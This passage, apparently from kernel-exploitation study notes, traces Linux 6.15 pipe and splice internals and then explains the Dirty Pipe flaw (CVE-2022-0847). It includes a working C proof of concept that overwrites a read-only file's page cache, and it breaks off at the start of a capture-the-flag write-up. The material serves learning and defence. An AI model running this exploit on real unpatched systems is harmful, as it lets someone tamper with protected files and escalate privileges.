* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;
wake_next_reader = true;
mutex_lock(&pipe->mutex);
}
```
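The PIPE_BUF_FLAG_PACKET branch above is what gives O_DIRECT pipes their packet semantics: one read() consumes at most one packet, even if the user buffer is larger. A minimal user-space sketch (assuming pipe2/O_DIRECT support):
```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    int fd[2];
    if (pipe2(fd, O_DIRECT) == -1) { perror("pipe2"); return 1; }

    /* two separate writes become two packets (PIPE_BUF_FLAG_PACKET, no merging) */
    if (write(fd[1], "first", 5) != 5 || write(fd[1], "second", 6) != 6) {
        perror("write");
        return 1;
    }

    char buf[64];
    ssize_t n = read(fd[0], buf, sizeof(buf));
    /* expect n == 5 ("first"), not 11: the packet boundary is preserved */
    printf("read %zd bytes: %.*s\n", n, (int)n, buf);
    return 0;
}
```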
The tail-update logic is as follows:
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L239
static inline unsigned int pipe_update_tail(struct pipe_inode_info *pipe,
struct pipe_buffer *buf,
unsigned int tail)
{
pipe_buf_release(pipe, buf);
/*
* If the pipe has a watch_queue, we need additional protection
* by the spinlock because notifications get posted with only
* this spinlock, no mutex
*/
if (pipe_has_watch_queue(pipe)) {
spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
if (buf->flags & PIPE_BUF_FLAG_LOSS)
pipe->note_loss = true;
#endif
pipe->tail = ++tail;
spin_unlock_irq(&pipe->rd_wait.lock);
return tail;
}
/*
* Without a watch_queue, we can simply increment the tail
* without the spinlock - the mutex is enough.
*/
pipe->tail = ++tail;
return tail;
}
```
That covers the call path for reading from a pipe into a user buffer.
## release
## splice
First, let's look at how the man page says it is used:
https://man7.org/linux/man-pages/man2/splice.2.html
```c
ssize_t splice(int fd_in, off_t *_Nullable off_in,
int fd_out, off_t *_Nullable off_out,
size_t size, unsigned int flags);
```
* fd_in: the input file descriptor
* off_in: pointer to the input file offset (may be NULL)
* fd_out: the output file descriptor
* off_out: pointer to the output file offset (may be NULL)
* size: the number of bytes to move
* flags: SPLICE_F_* options
splice() moves data between two file descriptors without copying it between user space and kernel space, so it is more efficient than read() + write(). It transfers at most size bytes, and at least one of the fds must be a pipe.
Rules for fd_in and off_in:
* if fd_in is a pipe → off_in must be NULL
* if fd_in is not a pipe and off_in == NULL → read from the current file offset, and update that offset automatically
* if fd_in is not a pipe and off_in != NULL → read from the offset given by \*off_in; the file's own offset is untouched, but \*off_in is updated
The fd_out / off_out rules are analogous to the fd_in / off_in ones. For the flags, see the man page directly.
Extra reference: https://www.kernel.org/doc/html/v6.15/filesystems/splice.html
From the above, there are three cases to consider (a small user-space example follows this list):
- pipe2pipe
- pipe2file
- file2pipe
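As promised, a minimal user-space sketch of splice usage: it moves a file into a pipe and then out of the pipe into another file, so the payload never passes through a user-space buffer. The paths are placeholders.
```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    int in  = open("/etc/hostname", O_RDONLY);                       /* placeholder input  */
    int out = open("/tmp/splice_copy", O_WRONLY | O_CREAT | O_TRUNC, 0644); /* placeholder output */
    if (in == -1 || out == -1) { perror("open"); return 1; }

    int p[2];
    if (pipe(p) == -1) { perror("pipe"); return 1; }

    for (;;) {
        /* file -> pipe: fd_in is not a pipe and off_in == NULL,
         * so the file offset is used and advanced automatically */
        ssize_t n = splice(in, NULL, p[1], NULL, 4096, 0);
        if (n <= 0)
            break;
        /* pipe -> file: fd_in is a pipe, so off_in must be NULL */
        while (n > 0) {
            ssize_t m = splice(p[0], NULL, out, NULL, (size_t)n, 0);
            if (m <= 0) { perror("splice"); return 1; }
            n -= m;
        }
    }
    close(in); close(out); close(p[0]); close(p[1]);
    return 0;
}
```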
Below is the kernel source. Calling splice enters the syscall, which does some flags/len checks, resolves the fds into file pointers with the `CLASS` macro, and then calls `__do_splice`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1615
SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
{
if (unlikely(!len))
return 0;
if (unlikely(flags & ~SPLICE_F_ALL))
return -EINVAL;
CLASS(fd, in)(fd_in);
if (fd_empty(in))
return -EBADF;
CLASS(fd, out)(fd_out);
if (fd_empty(out))
return -EBADF;
return __do_splice(fd_file(in), off_in, fd_file(out), off_out,
len, flags);
}
```
It first initializes the following variables:
* ipipe / opipe: point to the input/output pipe kernel structures; NULL if that fd is not a pipe
* offset: temporary storage for an offset
* \__off_in / \__off_out: point to the kernel-side offset variables; they are used when the caller passed offset arguments
It then uses `get_pipe_info` to check whether each fd is a pipe; for an fd that is a pipe, the corresponding offset must be NULL. The offsets are then copied from user space, and finally `do_splice` is called.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1396
static ssize_t __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
ssize_t ret;
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
if (ipipe) {
if (off_in)
return -ESPIPE;
pipe_clear_nowait(in);
}
if (opipe) {
if (off_out)
return -ESPIPE;
pipe_clear_nowait(out);
}
if (off_out) {
if (copy_from_user(&offset, off_out, sizeof(loff_t)))
return -EFAULT;
__off_out = &offset;
}
if (off_in) {
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
__off_in = &offset;
}
ret = do_splice(in, __off_in, out, __off_out, len, flags);
if (ret < 0)
return ret;
if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
return -EFAULT;
if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
return -EFAULT;
return ret;
}
```
It first checks that in is readable and out is writable, then calls get_pipe_info to obtain the corresponding `pipe_inode_info`s.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1299
/*
* Determine where to splice to/from.
*/
ssize_t do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
ssize_t ret;
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
```
Next come the three cases.
### pipe 2 pipe
The first case is pipe to pipe. It first makes sure neither offset was specified and that we are not splicing a pipe into itself, then calls `splice_pipe_to_pipe`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1314
if (ipipe && opipe) {
if (off_in || off_out)
return -ESPIPE;
/* Splicing to self would be fun, but... */
if (ipipe == opipe)
return -EINVAL;
if ((in->f_flags | out->f_flags) & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
ret = splice_pipe_to_pipe(ipipe, opipe, len, flags);
}
```
After declaring the in/out pipe_buffer, head, and tail variables, it calls `ipipe_prep` (and `opipe_prep`), which mainly make sure the source pipe has data to read (and the destination has room), either waiting in blocking mode or returning an error otherwise. It also avoids an ABBA deadlock by ordering the two pipe locks.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1715
/*
* Splice contents of ipipe to opipe.
*/
static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
struct pipe_inode_info *opipe,
size_t len, unsigned int flags)
{
struct pipe_buffer *ibuf, *obuf;
unsigned int i_head, o_head;
unsigned int i_tail, o_tail;
int ret = 0;
bool input_wakeup = false;
retry:
ret = ipipe_prep(ipipe, flags);
if (ret)
return ret;
ret = opipe_prep(opipe, flags);
if (ret)
return ret;
/*
* Potential ABBA deadlock, work around it by ordering lock
* grabbing by pipe info address. Otherwise two different processes
* could deadlock (one doing tee from A -> B, the other from B -> A).
*/
pipe_double_lock(ipipe, opipe);
i_tail = ipipe->tail;
o_head = opipe->head;
```
It then checks readers, writers, and whether the corresponding pipe is empty or full. Non-blocking versus blocking (SPLICE_F_NONBLOCK) basically decides between bailing out immediately and waiting.
```c
do {
size_t o_len;
if (!opipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
i_head = ipipe->head;
o_tail = opipe->tail;
if (pipe_empty(i_head, i_tail) && !ipipe->writers)
break;
/*
* Cannot make any progress, because either the input
* pipe is empty or the output pipe is full.
*/
if (pipe_empty(i_head, i_tail) ||
pipe_full(o_head, o_tail, opipe->max_usage)) {
/* Already processed some buffers, break */
if (ret)
break;
if (flags & SPLICE_F_NONBLOCK) {
ret = -EAGAIN;
break;
}
/*
* We raced with another reader/writer and haven't
* managed to process any buffers. A zero return
* value means EOF, so retry instead.
*/
pipe_unlock(ipipe);
pipe_unlock(opipe);
goto retry;
}
```
pipe_buf fetches the pipe_buffer at the input pipe's tail and the one at the output pipe's head. If the requested len covers the whole input buffer, the entire struct is simply copied over, the ibuf's ops are cleared, and the output pipe's head is advanced (the next pipe_buffer slot to write). Otherwise only part of the buffer is copied, but the logic is much the same.
```c
ibuf = pipe_buf(ipipe, i_tail);
obuf = pipe_buf(opipe, o_head);
if (len >= ibuf->len) {
/*
* Simply move the whole buffer from ipipe to opipe
*/
*obuf = *ibuf;
ibuf->ops = NULL;
i_tail++;
ipipe->tail = i_tail;
input_wakeup = true;
o_len = obuf->len;
o_head++;
opipe->head = o_head;
} else {
/*
* Get a reference to this pipe buffer,
* so we can copy the contents over.
*/
if (!pipe_buf_get(ipipe, ibuf)) {
if (ret == 0)
ret = -EFAULT;
break;
}
*obuf = *ibuf;
/*
* Don't inherit the gift and merge flags, we need to
* prevent multiple steals of this page.
*/
obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;
obuf->len = len;
ibuf->offset += len;
ibuf->len -= len;
o_len = len;
o_head++;
opipe->head = o_head;
}
ret += o_len;
len -= o_len;
} while (len);
```
### pipe 2 file
The checks here follow the same logic as before; in addition it calls `rw_verify_area` to validate access to the file, and finally calls `do_splice_from`.
```c
} else if (ipipe) {
if (off_in)
return -ESPIPE;
if (off_out) {
if (!(out->f_mode & FMODE_PWRITE))
return -EINVAL;
offset = *off_out;
} else {
offset = out->f_pos;
}
if (unlikely(out->f_flags & O_APPEND))
return -EINVAL;
ret = rw_verify_area(WRITE, out, &offset, len);
if (unlikely(ret < 0))
return ret;
if (in->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
file_start_write(out);
ret = do_splice_from(ipipe, out, &offset, len, flags);
file_end_write(out);
if (!off_out)
out->f_pos = offset;
else
*off_out = offset;
```
It then calls the output (regular) file's `splice_write` (defined in its file ops, [src](https://elixir.bootlin.com/linux/v6.15.9/source/block/fops.c#L900)); splice_write ends up in `iter_file_splice_write`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L930
/*
* Attempt to initiate a splice from pipe to file.
*/
static ssize_t do_splice_from(struct pipe_inode_info *pipe, struct file *out,
loff_t *ppos, size_t len, unsigned int flags)
{
if (unlikely(!out->f_op->splice_write))
return warn_unsupported(out, "write");
return out->f_op->splice_write(pipe, out, ppos, len, flags);
}
```
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L648
/**
* iter_file_splice_write - splice data from a pipe to a file
* @pipe: pipe info (in)
* @out: file to write to
* @ppos: position in @out
* @len: number of bytes to splice
* @flags: splice modifier flags
*
* Description:
* Will either move or copy pages (determined by @flags options) from
* the given pipe inode to the given file.
* This one is ->write_iter-based.
*
*/
ssize_t
iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
loff_t *ppos, size_t len, unsigned int flags)
{
struct splice_desc sd = {
.total_len = len,
.flags = flags,
.pos = *ppos,
.u.file = out,
};
int nbufs = pipe->max_usage;
struct bio_vec *array;
ssize_t ret;
```
splice_desc tracks the state of the splice operation:
* total_len: the remaining amount of data to write
* num_spliced: the amount of data already written successfully
* pos: the file offset
* need_wakeup: whether other waiters on the pipe need to be woken up
It then kcallocs max_usage bio_vecs and locks the pipe.
```c
if (!out->f_op->write_iter)
return -EINVAL;
array = kcalloc(nbufs, sizeof(struct bio_vec), GFP_KERNEL);
if (unlikely(!array))
return -ENOMEM;
pipe_lock(pipe);
```
struct bio_vec is the data structure the I/O subsystem uses to describe a contiguous physical memory range:
* bv_page points to the page
* bv_len is the actual length of the range
* bv_offset is where the data starts inside bv_page; if the data does not start at the beginning of the page, the offset says where it does
https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19
```c
/**
* struct bio_vec - a contiguous range of physical memory addresses
* @bv_page: First page associated with the address range.
* @bv_len: Number of bytes in the address range.
* @bv_offset: Start of the address range relative to the start of @bv_page.
*
* The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len:
*
* nth_page(@bv_page, n) == @bv_page + n
*
* This holds because page_is_mergeable() checks the above property.
*/
struct bio_vec {
struct page *bv_page;
unsigned int bv_len;
unsigned int bv_offset;
};
```
sd (the counters and state) is initialized:
```c
splice_from_pipe_begin(&sd);
```
`splice_from_pipe_next` makes sure the pipe has data that can be spliced, handling the waiting / non-blocking logic. The bio_vec array is also re-kcalloced here if the pipe's max_usage has grown, in case the initial allocation turned out too small.
```c
while (sd.total_len) {
struct kiocb kiocb;
struct iov_iter from;
unsigned int head, tail;
size_t left;
int n;
ret = splice_from_pipe_next(pipe, &sd);
if (ret <= 0)
break;
if (unlikely(nbufs < pipe->max_usage)) {
kfree(array);
nbufs = pipe->max_usage;
array = kcalloc(nbufs, sizeof(struct bio_vec),
GFP_KERNEL);
if (!array) {
ret = -ENOMEM;
break;
}
}
```
Then, based on the length to transfer, the bio_vec array is built. tail is advanced until it meets head (all data consumed) or the requested size has been gathered.
```c
/* build the vector */
left = sd.total_len;
for (n = 0; !pipe_empty(head, tail) && left && n < nbufs; tail++) {
struct pipe_buffer *buf = pipe_buf(pipe, tail);
size_t this_len = buf->len;
/* zero-length bvecs are not supported, skip them */
if (!this_len)
continue;
this_len = min(this_len, left);
ret = pipe_buf_confirm(pipe, buf);
if (unlikely(ret)) {
if (ret == -ENODATA)
ret = 0;
goto done;
}
bvec_set_page(&array[n], buf->page, this_len,
buf->offset);
left -= this_len;
n++;
}
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L37
/**
* bvec_set_page - initialize a bvec based off a struct page
* @bv: bvec to initialize
* @page: page the bvec should point to
* @len: length of the bvec
* @offset: offset into the page
*/
static inline void bvec_set_page(struct bio_vec *bv, struct page *page,
unsigned int len, unsigned int offset)
{
bv->bv_page = page;
bv->bv_len = len;
bv->bv_offset = offset;
}
```
The bio_vec array is then wrapped into an iov_iter so write_iter can be called uniformly to write to the file, and a kiocb is initialized for the output position.
```c
iov_iter_bvec(&from, ITER_SOURCE, array, n, sd.total_len - left);
init_sync_kiocb(&kiocb, out);
kiocb.ki_pos = sd.pos;
```
write_iter writes the bvec data out through the kiocb, and the splice's current position is updated afterwards.
```c
ret = out->f_op->write_iter(&kiocb, &from);
sd.pos = kiocb.ki_pos;
```
Afterwards the pipe state is adjusted and fully consumed buffers are released:
```c
if (ret <= 0)
break;
sd.num_spliced += ret;
sd.total_len -= ret;
*ppos = sd.pos;
/* dismiss the fully eaten buffers, adjust the partial one */
tail = pipe->tail;
while (ret) {
struct pipe_buffer *buf = pipe_buf(pipe, tail);
if (ret >= buf->len) {
ret -= buf->len;
buf->len = 0;
pipe_buf_release(pipe, buf);
tail++;
pipe->tail = tail;
if (pipe->files)
sd.need_wakeup = true;
} else {
buf->offset += ret;
buf->len -= ret;
ret = 0;
}
}
}
done:
kfree(array);
splice_from_pipe_end(pipe, &sd);
pipe_unlock(pipe);
if (sd.num_spliced)
ret = sd.num_spliced;
return ret;
```
### file 2 pipe
The validation is much like before; it ends by calling `splice_file_to_pipe`.
```c
} else if (opipe) {
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}
ret = rw_verify_area(READ, in, &offset, len);
if (unlikely(ret < 0))
return ret;
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;
```
It first takes the lock and makes sure the output pipe has enough space, then calls `do_splice_read`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1279
ssize_t splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
ssize_t ret;
pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
ret = do_splice_read(in, offset, opipe, len, flags);
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
return ret;
}
```
* in → the source file
* ppos → the file offset
* pipe → the destination pipe
* len → the number of bytes to read
* flags → splice flags (e.g. SPLICE_F_NONBLOCK)
It then confirms the input file is readable. pipe_buf_usage(pipe) computes how many buffers the pipe currently occupies, and p_space is how many buffers the pipe can still hold; we must not read more than the pipe has room for. A regular file goes through its `splice_read`:
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L953
/*
* Callers already called rw_verify_area() on the entire range.
* No need to call it for sub ranges.
*/
static ssize_t do_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
unsigned int p_space;
if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;
if (!len)
return 0;
/* Don't try to read more the pipe has space for. */
p_space = pipe->max_usage - pipe_buf_usage(pipe);
len = min_t(size_t, len, p_space << PAGE_SHIFT);
if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;
if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
/*
* O_DIRECT and DAX don't deal with the pagecache, so we allocate a
* buffer, copy into it and splice that into the pipe.
*/
if ((in->f_flags & O_DIRECT) || IS_DAX(in->f_mapping->host))
return copy_splice_read(in, ppos, pipe, len, flags);
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}
```
The fop's `splice_read` ends up in `filemap_splice_read`. Many articles say this goes through `generic_file_splice_read()`, but this patch changed it to call `filemap_splice_read`:
https://lkml.indiana.edu/2305.2/05830.html
https://git.sceen.net/linux/linux-stable.git/commit/fs/ufs?h=v5.7-rc7&id=2cb1e08985e3dc59d0a4ebf770a87e3e2410d985
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L28
const struct file_operations generic_ro_fops = {
.llseek = generic_file_llseek,
.read_iter = generic_file_read_iter,
.mmap = generic_file_readonly_mmap,
.splice_read = filemap_splice_read,
};
```
After initializing its variables, it sets up the iocb for in, works out how many pages the pipe can still hold, clamps the read length len to that available capacity, and then initializes the folio_batch.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2939
/**
* filemap_splice_read - Splice data from a file's pagecache into a pipe
* @in: The file to read from
* @ppos: Pointer to the file position to read from
* @pipe: The pipe to splice into
* @len: The amount to splice
* @flags: The SPLICE_F_* flags
*
* This function gets folios from a file's pagecache and splices them into the
* pipe. Readahead will be called as necessary to fill more folios. This may
* be used for blockdevs also.
*
* Return: On success, the number of bytes read will be returned and *@ppos
* will be updated if appropriate; 0 will be returned if there is no more data
* to be read; -EAGAIN will be returned if the pipe had no space, and some
* other negative error code will be returned on error. A short read may occur
* if the pipe has insufficient space, we reach the end of the data or we hit a
* hole.
*/
ssize_t filemap_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe,
size_t len, unsigned int flags)
{
struct folio_batch fbatch;
struct kiocb iocb;
size_t total_spliced = 0, used, npages;
loff_t isize, end_offset;
bool writably_mapped;
int i, error = 0;
if (unlikely(*ppos >= in->f_mapping->host->i_sb->s_maxbytes))
return 0;
init_sync_kiocb(&iocb, in);
iocb.ki_pos = *ppos;
/* Work out how much data we can actually add into the pipe */
used = pipe_buf_usage(pipe);
npages = max_t(ssize_t, pipe->max_usage - used, 0);
len = min_t(size_t, len, npages * PAGE_SIZE);
folio_batch_init(&fbatch);
```
A folio_batch is a structure describing a group of folios; a folio represents a contiguous chunk of page-cache memory (at least one page).
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pagevec.h#L19
/**
* struct folio_batch - A collection of folios.
*
* The folio_batch is used to amortise the cost of retrieving and
* operating on a set of folios. The order of folios in the batch may be
* significant (eg delete_from_page_cache_batch()). Some users of the
* folio_batch store "exceptional" entries in it which can be removed
* by calling folio_batch_remove_exceptionals().
*/
struct folio_batch {
unsigned char nr;
unsigned char i;
bool percpu_pvec_drained;
struct folio *folios[PAGEVEC_SIZE];
};
```
iocb.ki_pos is set to say where in the file to start taking data. `filemap_get_pages()` fetches the data at that offset from the file's page cache and fills the file's pages into the folios of the folio_batch.
```c
do {
cond_resched();
if (*ppos >= i_size_read(in->f_mapping->host))
break;
iocb.ki_pos = *ppos;
error = filemap_get_pages(&iocb, len, &fbatch, true);
if (error < 0)
break;
```
The key part of this block is reading the data out of the folios (`splice_folio_into_pipe`):
```c
/*
* i_size must be checked after we know the pages are Uptodate.
*
* Checking i_size after the check allows us to calculate
* the correct value for "nr", which means the zero-filled
* part of the page is not copied back to userspace (unless
* another truncate extends the file - this is desired though).
*/
isize = i_size_read(in->f_mapping->host);
if (unlikely(*ppos >= isize))
break;
end_offset = min_t(loff_t, isize, *ppos + len);
/*
* Once we start copying data, we don't want to be touching any
* cachelines that might be contended:
*/
writably_mapped = mapping_writably_mapped(in->f_mapping);
for (i = 0; i < folio_batch_count(&fbatch); i++) {
struct folio *folio = fbatch.folios[i];
size_t n;
if (folio_pos(folio) >= end_offset)
goto out;
folio_mark_accessed(folio);
/*
* If users can be writing to this folio using arbitrary
* virtual addresses, take care of potential aliasing
* before reading the folio on the kernel side.
*/
if (writably_mapped)
flush_dcache_folio(folio);
n = min_t(loff_t, len, isize - *ppos);
n = splice_folio_into_pipe(pipe, folio, *ppos, n);
if (!n)
goto out;
len -= n;
total_spliced += n;
*ppos += n;
in->f_ra.prev_pos = *ppos;
if (pipe_is_full(pipe))
goto out;
}
folio_batch_release(&fbatch);
} while (len);
```
To clarify a bit: the file's data ends up in the folios of the folio_batch via filemap_get_pages, and here the folio's pages are handed over into pipe_buffers. That is how the file's data is "copied" into the pipe: the pipe object and the file object share the same struct page. Seen from the perspective of `struct page`, the file's pages move into folios and then into pipe_buffers. Because the pipe_buffer here is initialized with a `.key = value` designated initializer, flags is implicitly set to 0, so there is no Dirty Pipe problem at the moment (if this mechanism is ever changed or patched, it is worth checking again).
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2909
/*
* Splice subpages from a folio into a pipe.
*/
size_t splice_folio_into_pipe(struct pipe_inode_info *pipe,
struct folio *folio, loff_t fpos, size_t size)
{
struct page *page;
size_t spliced = 0, offset = offset_in_folio(folio, fpos);
page = folio_page(folio, offset / PAGE_SIZE);
size = min(size, folio_size(folio) - offset);
offset %= PAGE_SIZE;
while (spliced < size && !pipe_is_full(pipe)) {
struct pipe_buffer *buf = pipe_head_buf(pipe);
size_t part = min_t(size_t, PAGE_SIZE - offset, size - spliced);
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops,
.page = page,
.offset = offset,
.len = part,
};
folio_get(folio);
pipe->head++;
page++;
spliced += part;
offset = 0;
}
return spliced;
}
```
Finally the folio_batch is released:
```c
out:
folio_batch_release(&fbatch);
file_accessed(in);
return total_spliced ? total_spliced : error;
}
EXPORT_SYMBOL(filemap_splice_read);
```
You can run this to observe how a designated initializer zeroes the members that are not named:
```c
#include <stdio.h>
#include <stddef.h>
struct Test_buf {
int a;
int b;
int c;
int d;
};
int main() {
struct Test_buf buf;
buf.d = 123;
buf = (struct Test_buf){
.a = 42,
.b = 99
};
printf("a = %d\n", buf.a);
printf("b = %d\n", buf.b);
printf("c = %d\n", buf.c);
printf("d = %d\n", buf.d);
return 0;
}
```
## bio_vec
Let's go into a bit more detail on bio_vec (it was only briefly described above). The basic structure is shown below: one bio_vec covers part of a page or a whole page, and a group of bio_vecs makes up a bio, since a single I/O request may consist of many segments.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19
/**
* struct bio_vec - a contiguous range of physical memory addresses
* @bv_page: First page associated with the address range.
* @bv_len: Number of bytes in the address range.
* @bv_offset: Start of the address range relative to the start of @bv_page.
*
* The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len:
*
* nth_page(@bv_page, n) == @bv_page + n
*
* This holds because page_is_mergeable() checks the above property.
*/
struct bio_vec {
struct page *bv_page;
unsigned int bv_len;
unsigned int bv_offset;
};
```
The full bio looks like this: one bio represents a complete block I/O request, and each bio_vec is one physical-memory segment of that request.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/blk_types.h#L214
/*
* main unit of I/O for the block layer and lower layers (ie drivers and
* stacking drivers)
*/
struct bio {
struct bio *bi_next; /* request queue link */
struct block_device *bi_bdev;
blk_opf_t bi_opf; /* bottom bits REQ_OP, top bits
* req_flags.
*/
unsigned short bi_flags; /* BIO_* below */
unsigned short bi_ioprio;
enum rw_hint bi_write_hint;
blk_status_t bi_status;
atomic_t __bi_remaining;
struct bvec_iter bi_iter;
union {
/* for polled bios: */
blk_qc_t bi_cookie;
/* for plugged zoned writes only: */
unsigned int __bi_nr_segments;
};
bio_end_io_t *bi_end_io;
void *bi_private;
#ifdef CONFIG_BLK_CGROUP
/*
* Represents the association of the css and request_queue for the bio.
* If a bio goes direct to device, it will not have a blkg as it will
* not have a request_queue associated with it. The reference is put
* on release of the bio.
*/
struct blkcg_gq *bi_blkg;
struct bio_issue bi_issue;
#ifdef CONFIG_BLK_CGROUP_IOCOST
u64 bi_iocost_cost;
#endif
#endif
#ifdef CONFIG_BLK_INLINE_ENCRYPTION
struct bio_crypt_ctx *bi_crypt_context;
#endif
#if defined(CONFIG_BLK_DEV_INTEGRITY)
struct bio_integrity_payload *bi_integrity; /* data integrity */
#endif
unsigned short bi_vcnt; /* how many bio_vec's */
/*
* Everything starting with bi_max_vecs will be preserved by bio_reset()
*/
unsigned short bi_max_vecs; /* max bvl_vecs we can hold */
atomic_t __bi_cnt; /* pin count */
struct bio_vec *bi_io_vec; /* the actual vec list */
struct bio_set *bi_pool;
/*
* We can inline a number of vecs at the end of the bio, to avoid
* double allocations for a small number of bio_vecs. This member
* MUST obviously be kept at the very end of the bio.
*/
struct bio_vec bi_inline_vecs[];
};
```
bio_vec is used above presumably because its shape is very similar to pipe_buffer's: a page plus an offset and a length.
## folio
https://blog.csdn.net/feelabclihu/article/details/131485936
## Dirty pipe
正如先前所說的
若沒有在 splice file2pipe 的時候去初始化 flags 就會出問題
原因如下
嘗試先隨便用 `write` 寫入東西到 pipe 中,此時結束後會被設置 `PIPE_BUF_FLAG_CAN_MERGE`
這件事我們先記著
另外來看看 file2pipe
file 的 struct page 最後會跟 pipe_buffer 共享
此時思考一件事
如果在 file2pipe 沒有去初始化 flags 會發生甚麼事
那不就會當你去 write 一個 struct page 與 file 共享的 pipe 的時候
因為 `PIPE_BUF_FLAG_CAN_MERGE` 被設置,可以去寫到前一個 page (與 file 共享),也就可以繞過檔案權限檢查,向 read only 寫入資料 (因為需要預先 write 一個東西到 pipe,此時會改變他的 offset,導致第一個 byte 無法改動,不過也夠用來提權了
額外可以參考
https://dirtypipe.cm4all.com/
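For reference, a minimal sketch of the original CVE-2022-0847 primitive described above (no UAF needed on vulnerable kernels, roughly 5.8 up to the 5.16.11/5.15.25/5.10.102 fixes). The target path, offset, and payload are placeholders, and the pipe is assumed to keep the default 16-slot / 64 KiB ring:
```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static void prepare_pipe(int p[2])
{
    char buf[4096];
    memset(buf, 'A', sizeof(buf));
    /* fill every ring slot so each pipe_buffer gets PIPE_BUF_FLAG_CAN_MERGE ... */
    for (int i = 0; i < 16; i++)
        write(p[1], buf, sizeof(buf));
    /* ... then drain it again: the slots become reusable but keep their flags */
    for (int i = 0; i < 16; i++)
        read(p[0], buf, sizeof(buf));
}

int main(void)
{
    const char *target  = "/tmp/readonly_target";   /* placeholder path */
    const char *payload = "overwritten";
    loff_t target_off = 1;                 /* where we want to write; byte 0 is unreachable */

    int fd = open(target, O_RDONLY);
    int p[2];
    if (fd == -1 || pipe(p) == -1) { perror("setup"); return 1; }

    prepare_pipe(p);

    /* splice one byte ending just before target_off, so the head pipe_buffer now
     * points at the file's page-cache page with the stale CAN_MERGE flag */
    loff_t splice_off = target_off - 1;
    if (splice(fd, &splice_off, p[1], NULL, 1, 0) != 1) { perror("splice"); return 1; }

    /* on a vulnerable kernel this write is merged into the file's page cache */
    if (write(p[1], payload, strlen(payload)) < 0) { perror("write"); return 1; }
    return 0;
}
```
The challenge below uses the same merge-into-a-shared-page idea, but on a patched kernel it needs a separate UAF to set the flag by hand.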
## Dirty Pipe challenge
https://github.com/r1ru/linux-kernel-exploitation/tree/main/dirty-pipe
### analyze source code
The module registers a `vuln` device and exposes an ioctl with four commands.
```c
static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
request_t req;
long ret;
